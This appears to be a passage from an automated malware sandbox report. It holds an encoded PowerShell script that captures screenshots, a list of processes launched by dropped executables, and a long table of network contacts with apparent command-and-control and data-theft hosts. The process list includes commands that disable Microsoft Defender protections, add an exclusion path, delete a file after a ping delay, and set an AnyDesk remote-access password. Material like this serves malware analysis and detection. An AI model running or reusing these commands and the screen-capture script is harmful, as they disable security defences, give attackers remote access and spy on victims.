IAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe
"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6004 -ip 6004
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Users\Admin\AppData\Local\complacence\outvaunts.exe
"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 992
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo L0ckB1tter3 "
\??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe
"c:\Program Files (x86)\AnyDesk\anydesk.exe" --set-password
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3352 -ip 3352
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 188
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.66.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.66.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 162.159.136.234:443 | gateway.discord.gg | tcp |
| US | 8.8.8.8:53 | 234.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| FR | 194.59.30.220:1336 | tcp | |
| US | 8.8.8.8:53 | 220.30.59.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 8.8.8.8:53 | 10.244.41.31.in-addr.arpa | udp |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| US | 8.8.8.8:53 | 12.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 238.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 225.74.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.135.115:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.33.115.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 115.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.249.124.192.in-addr.arpa | udp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | grahm.xyz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.10.203.116.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| GB | 88.221.135.115:80 | e5.o.lencr.org | tcp |
| US | 172.67.216.167:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 167.216.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | fightlsoser.click | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 172.67.213.48:443 | fightlsoser.click | tcp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 64.206.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.191.200.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.213.67.172.in-addr.arpa | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 66.45.226.53:7777 | 66.45.226.53 | tcp |
| RU | 83.217.204.194:80 | 83.217.204.194 | tcp |
| RU | 178.215.120.185:1723 | tcp | |
| RU | 83.217.206.117:3389 | tcp | |
| RU | 83.217.192.194:8080 | 83.217.192.194 | tcp |
| RU | 83.217.206.25:2000 | tcp | |
| RU | 213.108.16.154:111 | tcp | |
| RU | 89.169.1.216:443 | tcp | |
| RU | 178.215.75.170:80 | tcp | |
| RU | 178.215.74.17:23 | tcp | |
| RU | 83.217.192.194:8080 | tcp | |
| RU | 83.217.219.114:465 | tcp | |
| RU | 89.169.20.205:49155 | tcp | |
| RU | 178.215.74.228:8011 | tcp | |
| RU | 83.217.197.147:22 | tcp | |
| RU | 89.169.1.199:22 | tcp | |
| RU | 89.169.41.215:443 | tcp | |
| RU | 83.217.192.194:8080 | tcp | |
| RU | 89.169.0.114:8292 | tcp | |
| RU | 89.169.22.207:8080 | tcp | |
| RU | 178.215.90.34:80 | tcp | |
| RU | 213.108.19.30:445 | tcp | |
| US | 8.8.8.8:53 | 53.226.45.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.204.217.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.75.215.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.197.217.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.74.215.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.19.108.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.192.217.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | peerhost59mj7i6macla65r.com | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 8.8.8.8:53 | 218.172.154.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.90.215.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| N/A | 127.0.0.1:8080 | tcp | |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| DE | 101.99.92.189:8080 | tcp | |
| US | 8.8.8.8:53 | 189.92.99.101.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sanboxland.pro | udp |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| US | 8.8.8.8:53 | 209.131.35.89.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | grahm.xyz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 172.67.139.78:443 | drive-connect.cyou | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | 78.139.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.58.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 227.95.123.104.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | a1060630.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1060630.xsph.ru | tcp |
| US | 8.8.8.8:53 | 138.192.8.141.in-addr.arpa | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | f0706909.xsph.ru | udp |
| RU | 141.8.193.236:80 | f0706909.xsph.ru | tcp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 8.8.8.8:53 | 236.193.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.57.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:64295 | tcp | |
| N/A | 127.0.0.1:64433 | tcp | |
| DE | 185.220.101.195:443 | tcp | |
| US | 8.8.8.8:53 | 195.101.220.185.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| FR | 62.210.131.119:9001 | tcp | |
| DE | 51.89.106.29:8080 | tcp | |
| US | 8.8.8.8:53 | 119.131.210.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.106.89.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a1059592.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1059592.xsph.ru | tcp |
| FR | 94.23.121.150:9001 | tcp | |
| US | 8.8.8.8:53 | f1043947.xsph.ru | udp |
| RU | 141.8.192.151:80 | f1043947.xsph.ru | tcp |
| US | 8.8.8.8:53 | 150.121.23.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a1051707.xsph.ru | udp |
| RU | 141.8.192.217:80 | a1051707.xsph.ru | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | freegeoip.app | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 172.67.160.84:443 | freegeoip.app | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | ipbase.com | udp |
| FR | 142.250.75.227:443 | gstatic.com | tcp |
| US | 172.67.209.71:443 | ipbase.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 217.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.160.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.209.67.172.in-addr.arpa | udp |
| US | 154.216.17.90:80 | tcp | |
| RU | 176.113.115.19:80 | 176.113.115.19 | tcp |
| US | 8.8.8.8:53 | 19.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.speak-a-message.com | udp |
| DE | 195.201.119.163:80 | www.speak-a-message.com | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 163.119.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | awake-weaves.cyou | udp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 172.67.143.116:443 | awake-weaves.cyou | tcp |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | jrqh-hk.com | udp |
| CN | 123.136.92.99:80 | jrqh-hk.com | tcp |
| US | 8.8.8.8:53 | immureprech.biz | udp |
| US | 172.67.207.38:443 | immureprech.biz | tcp |
| US | 8.8.8.8:53 | 116.143.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | deafeninggeh.biz | udp |
| US | 104.21.16.1:443 | deafeninggeh.biz | tcp |
| US | 8.8.8.8:53 | effecterectz.xyz | udp |
| US | 8.8.8.8:53 | diffuculttan.xyz | udp |
| US | 8.8.8.8:53 | debonairnukk.xyz | udp |
| US | 8.8.8.8:53 | wrathful-jammy.cyou | udp |
| US | 104.21.74.196:443 | wrathful-jammy.cyou | tcp |
| US | 8.8.8.8:53 | 38.207.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.92.136.123.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.16.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.74.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sordid-snaked.cyou | udp |
| US | 172.67.141.195:443 | sordid-snaked.cyou | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 195.141.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.238.217.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | updates.signiant.com | udp |
| DE | 13.32.121.112:80 | updates.signiant.com | tcp |
| US | 8.8.8.8:53 | 112.121.32.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | www.hootech.com | udp |
| US | 107.191.125.184:80 | www.hootech.com | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | portals.mediashuttle.com | udp |
| US | 76.223.25.251:443 | portals.mediashuttle.com | tcp |
| US | 8.8.8.8:53 | 184.125.191.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 154.216.17.90:80 | tcp | |
| US | 8.8.8.8:53 | 251.25.223.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ship-amongst.gl.at.ply.gg | udp |
| US | 147.185.221.24:14429 | ship-amongst.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 24.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 76.223.25.251:443 | portals.mediashuttle.com | tcp |
| US | 76.223.25.251:443 | portals.mediashuttle.com | tcp |
| US | 76.223.25.251:443 | portals.mediashuttle.com | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | webcdn.triongames.com | udp |
| GB | 2.19.117.97:80 | webcdn.triongames.com | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | 97.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.68.81.185.in-addr.arpa | udp |
| DE | 87.120.84.32:80 | 87.120.84.32 | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| BG | 195.230.23.72:8085 | 195.230.23.72 | tcp |
| US | 8.8.8.8:53 | 32.84.120.87.in-addr.arpa | udp |
| RU | 185.81.68.147:1912 | tcp | |
| US | 8.8.8.8:53 | 72.23.230.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | get.geojs.io | udp |
| US | 172.67.70.233:443 | get.geojs.io | tcp |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| US | 8.8.8.8:53 | 233.70.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.113.215.185.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| DE | 94.156.177.133:7000 | tcp | |
| US | 154.216.17.90:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 133.177.156.94.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | boot-01.net.anydesk.com | udp |
| DE | 195.181.174.173:443 | boot-01.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-ad195ac5.net.anydesk.com | udp |
| GB | 57.128.141.163:80 | relay-ad195ac5.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 173.174.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.141.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| DE | 18.245.86.26:80 | api.playanext.com | tcp |
| US | 8.8.8.8:53 | 26.86.245.18.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 20.83.148.22:80 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| TH | 165.154.184.75:80 | 165.154.184.75 | tcp |
| US | 8.8.8.8:53 | boot.net.anydesk.com | udp |
| US | 8.8.8.8:53 | 75.184.154.165.in-addr.arpa | udp |
| DE | 57.129.37.75:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-79bdf984.net.anydesk.com | udp |
| GB | 195.181.165.153:443 | relay-79bdf984.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 75.37.129.57.in-addr.arpa | udp |
